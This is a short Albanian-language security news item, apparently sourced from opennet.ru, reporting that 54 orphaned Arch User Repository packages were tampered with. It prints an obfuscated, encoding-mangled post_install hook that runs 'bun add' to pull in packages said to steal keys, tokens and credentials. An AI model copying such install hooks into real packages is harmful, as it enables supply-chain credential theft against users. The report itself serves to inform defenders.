Në AUR është realizuar futja e kodit të dëmshëm në 54 paketa të tjera

Megjithëse masat e ndërmarra nga zhvilluesit e Arch Linux, aktiviteti i futjes së kodeve të dëmshme në depat AUR (Arch User Repository) nuk është ndalur. Para disa orësh, kodi i dëmshëm u fut përsëri në 54 paketa që ishin pa mbështetje (historiku i heqjes së ndryshimeve të dëmshme). Në dallim nga sulmet e datës së djeshme, këtë herë, për të instaluar varësi të dëmshme, u përdor platforma bun në vend të menaxherit të paketave npm. Për të kaluar filtrat e implementuar, një varg i obfuskatuar përfshihet në funksionin post_install, ku thirret komanda "bun add" për të instaluar paketa me kod të dëmshëm, që skanojnë dhe dërgojnë tek jasht server klisheve, tokeneve dhe kredencialeve.

post_install() {
$’\x63â€Č»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73â€Č ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Burimi: opennet.ru

Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« đŸ”„ Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« | ProHoster